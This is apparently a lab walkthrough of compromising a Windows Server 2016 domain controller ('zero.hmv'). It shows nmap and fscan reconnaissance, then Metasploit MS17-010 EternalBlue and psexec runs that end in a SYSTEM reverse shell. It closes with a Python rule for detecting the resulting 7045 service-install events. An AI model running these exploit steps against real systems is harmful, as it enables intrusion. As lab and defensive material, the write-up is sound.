┌──(root㉿kali)-[~]
└─# arp-scan -I eth1 192.168.56.0/24
WARNING: Could not obtain IP address for interface eth1. Using 0.0.0.0 for
the source address, which may not be what you want.
Either configure eth1 with an IP address, or manually specify the address
with the --arpspa option.
Interface: eth1, type: EN10MB, MAC: 00:0c:29:96:80:36, IPv4: (none)
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:47:0e:01 PCS Systemtechnik GmbH
192.168.56.110 08:00:27:b9:61:da PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.136 seconds (119.85 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap -sCV -p- --min-rate 10000 192.168.56.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-24 04:04 EDT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 12.67% done; ETC: 04:04 (0:00:14 remaining)
Nmap scan report for 192.168.56.110
Host is up (0.00081s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
445/tcp open tcpwrapped Windows Server 2016 Standard Evaluation 14393 tcpwrapped

Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2025-07-24T23:04:41
|_ start_date: 2025-07-24T23:03:32
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: DC01
| NetBIOS computer name: DC01\x00
| Domain name: zero.hmv
| Forest name: zero.hmv
| FQDN: DC01.zero.hmv
|_ System time: 2025-07-24T16:04:32-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 17h19m59s, deviation: 4h02m35s, median: 14h59m55s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.12 seconds
┌──(root㉿kali)-[/myift]
└─# ./fscan -h 192.168.56.110

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.56.110:135 open
192.168.56.110:139 open
192.168.56.110:445 open
192.168.56.110:88 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]192.168.56.110
[->]DC01
[->]192.168.56.110
[+] MS17-010 192.168.56.110 (Windows Server 2016 Standard Evaluation 14393)
[*] NetBios 192.168.56.110 [+] DC:DC01.zero.hmv Windows Server 2016 Standard Evaluation 14393
已完成 4/4
[*] 扫描结束,耗时: 3.072520325s

It looks like this host is a domain controller.

It also seems to be affected by MS17-010.

┌──(root㉿kali)-[/myift/bachang/win/zero]
└─# msfconsole
Metasploit tip: Use the resource command to run commands from a file


_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/


=[ metasploit v6.4.50-dev ]
+ -- --=[ 2496 exploits - 1283 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf6 > use 24
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlis yes List of named pipes to check
ts/named_pipes.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.56.110
rhosts => 192.168.56.110
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.56.110:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.56.110:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The scanner module further confirms that the EternalBlue (MS17-010) vulnerability is present.

msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > eternalblue
[-] Unknown command: eternalblue. Run the help command for more details.
msf6 > search eternalblue

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Win
dows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows
Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded
Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.106.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.56.110
rhosts => 192.168.56.110
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.56.103
lhost => 192.168.56.103
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.56.103:4444
[*] 192.168.56.110:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.56.110:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.56.110:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.56.110:445 - The target is vulnerable.
[*] 192.168.56.110:445 - Connecting to target for exploitation.
[+] 192.168.56.110:445 - Connection established for exploitation.
[+] 192.168.56.110:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.110:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.56.110:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.56.110:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva
[*] 192.168.56.110:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393
[+] 192.168.56.110:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.110:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.56.110:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.110:445 - Starting non-paged pool grooming
[+] 192.168.56.110:445 - Sending SMBv2 buffers
[+] 192.168.56.110:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.110:445 - Sending final SMBv2 buffers.
[*] 192.168.56.110:445 - Sending last fragment of exploit packet!
[*] 192.168.56.110:445 - Receiving response from exploit packet
[+] 192.168.56.110:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.110:445 - Sending egg to corrupted connection.
[*] 192.168.56.110:445 - Triggering free of corrupted buffer.
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.56.110:445 - Connecting to target for exploitation.
[+] 192.168.56.110:445 - Connection established for exploitation.
[+] 192.168.56.110:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.110:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.56.110:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.56.110:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva
[*] 192.168.56.110:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393
[+] 192.168.56.110:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.110:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.56.110:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.110:445 - Starting non-paged pool grooming
[+] 192.168.56.110:445 - Sending SMBv2 buffers
[+] 192.168.56.110:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.110:445 - Sending final SMBv2 buffers.
[*] 192.168.56.110:445 - Sending last fragment of exploit packet!
[*] 192.168.56.110:445 - Receiving response from exploit packet
[+] 192.168.56.110:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.110:445 - Sending egg to corrupted connection.
[*] 192.168.56.110:445 - Triggering free of corrupted buffer.
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.56.110:445 - Connecting to target for exploitation.
[+] 192.168.56.110:445 - Connection established for exploitation.
[+] 192.168.56.110:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.110:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.56.110:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.56.110:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva
[*] 192.168.56.110:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393
[+] 192.168.56.110:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.110:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.56.110:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.110:445 - Starting non-paged pool grooming
[+] 192.168.56.110:445 - Sending SMBv2 buffers
[+] 192.168.56.110:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.110:445 - Sending final SMBv2 buffers.
[*] 192.168.56.110:445 - Sending last fragment of exploit packet!
[*] 192.168.56.110:445 - Receiving response from exploit packet
[+] 192.168.56.110:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.110:445 - Sending egg to corrupted connection.
[*] 192.168.56.110:445 - Triggering free of corrupted buffer.
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.110:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.

The windows/smb/ms17_010_eternalblue module already obtained SYSTEM execution, but the shell was never bounced back to us.

msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.56.110
RHOSTS => 192.168.56.110
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.56.103
LHOST => 192.168.56.103
msf6 exploit(windows/smb/ms17_010_psexec) >
msf6 exploit(windows/smb/ms17_010_psexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.56.103:8888
[*] 192.168.56.110:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.56.110:445 - Built a write-what-where primitive...
[+] 192.168.56.110:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.56.110:445 - Selecting PowerShell target
[*] 192.168.56.110:445 - Executing the payload...
[+] 192.168.56.110:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/x64/shell/reverse_tcp
PAYLOAD => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.56.103:8888
[*] 192.168.56.110:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.56.110:445 - Built a write-what-where primitive...
[+] 192.168.56.110:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.56.110:445 - Selecting PowerShell target
[*] 192.168.56.110:445 - Executing the payload...
[+] 192.168.56.110:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

msf6 exploit(windows/smb/ms17_010_psexec) > show targets

Exploit targets:
=================

Id Name
-- ----
=> 0 Automatic
1 PowerShell
2 Native upload
3 MOF upload

msf6 exploit(windows/smb/ms17_010_psexec) > set target 2
target => 2
msf6 exploit(windows/smb/ms17_010_psexec) > show targets

Exploit targets:
=================

Id Name
-- ----
0 Automatic
1 PowerShell
=> 2 Native upload
3 MOF upload


msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.56.103:8888
[*] 192.168.56.110:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.56.110:445 - Built a write-what-where primitive...
[+] 192.168.56.110:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.56.110:445 - Uploading payload... lZPldmxD.exe
[*] 192.168.56.110:445 - Created \lZPldmxD.exe...
[+] 192.168.56.110:445 - Service started successfully...
[*] 192.168.56.110:445 - Deleting \lZPldmxD.exe...
[*] Sending stage (336 bytes) to 192.168.56.110
[*] Command shell session 1 opened (192.168.56.103:8888 -> 192.168.56.110:49791) at 2025-07-24 05:07:56 -0400


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----


C:\Windows\system32>whoami
whoami
nt authority\system


windows/smb/ms17_010_psexec behaved the same as the module above at first and could not complete the final reverse shell. After switching to the file-upload path (the Native upload target), which writes an executable and starts it as a service, the shell came back and it succeeded.
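From the defender's side, the Native upload path leaves a durable trace even though the dropped binary (\lZPldmxD.exe above) is deleted seconds later: Windows writes a System log event 7045 ("A service was installed in the system") recording the service name, image path and account. The script below is an added example, not code from this write-up or from Metasploit; it runs a small triage rule over constructed 7045 records and flags the pattern seen here, an executable dropped at the root of a drive (the ADMIN$/C$ share root) with an 8-character random-looking name, running as LocalSystem. The field labels follow the 7045 event's own labels, but every record, service name and path in SAMPLE_EVENTS is made up for this example.

```python
import re
from dataclasses import dataclass, field

# Pattern seen in the write-up: the payload is written to the share root,
# i.e. directly under the drive letter, with no subdirectory.
ROOT_DROP = re.compile(r"^[A-Za-z]:\\[^\\]+$")
# Randomly generated 8-character alphanumeric file name plus .exe.
RANDOM_EXE = re.compile(r"^[A-Za-z0-9]{8}\.exe$", re.IGNORECASE)

# Constructed sample records modelled on Event ID 7045 from the System log.
# Values are invented for this example (only the first path copies the
# file name shown in the write-up); the service names are not from the page.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "DC01.zero.hmv", "ServiceName": "svc_example1",
     "ImagePath": r"C:\lZPldmxD.exe", "ServiceType": "user mode service",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "DC01.zero.hmv", "ServiceName": "Sense",
     "ImagePath": r"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe",
     "ServiceType": "user mode service", "StartType": "auto start",
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "DC01.zero.hmv", "ServiceName": "svc_example2",
     "ImagePath": r"C:\Windows\Temp\Qx7mK2pL.exe", "ServiceType": "user mode service",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    # Unrelated logon event: must be ignored by the rule.
    {"EventID": 4624, "Computer": "DC01.zero.hmv", "AccountName": "zero\\someuser"},
]


@dataclass
class Finding:
    computer: str
    service_name: str
    image_path: str
    severity: str
    reasons: list = field(default_factory=list)


def basename(path):
    """Last path component of a Windows path."""
    return path.rsplit("\\", 1)[-1]


def assess(event):
    """Return a Finding for a suspicious 7045 record, or None."""
    if event.get("EventID") != 7045:
        return None
    path = event.get("ImagePath", "").strip('"')
    reasons = []
    if ROOT_DROP.match(path):
        reasons.append("service binary dropped at the root of a drive (share root)")
    if RANDOM_EXE.match(basename(path)):
        reasons.append("8-character random-looking executable name")
    if not reasons:
        return None
    if event.get("AccountName", "").lower() == "localsystem":
        reasons.append("service runs as LocalSystem")
    # A share-root drop is the strongest signal; a random name elsewhere
    # still deserves a look but is more likely to be a benign installer.
    severity = "high" if ROOT_DROP.match(path) else "medium"
    return Finding(event.get("Computer", "?"), event.get("ServiceName", "?"),
                   path, severity, reasons)


def analyze(events):
    """Run the rule over a batch of records and keep only the hits."""
    return [f for f in (assess(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.computer} service={f.service_name} path={f.image_path}")
        for r in f.reasons:
            print("    -", r)
```

On the domain controller from the write-up this would fire on the dropped executable even after it was deleted, because the 7045 record is the artifact that survives. The rule is intentionally narrow; a real deployment would pair it with the lateral-movement context (an SMB session from an unexpected host writing to ADMIN$ shortly before the event).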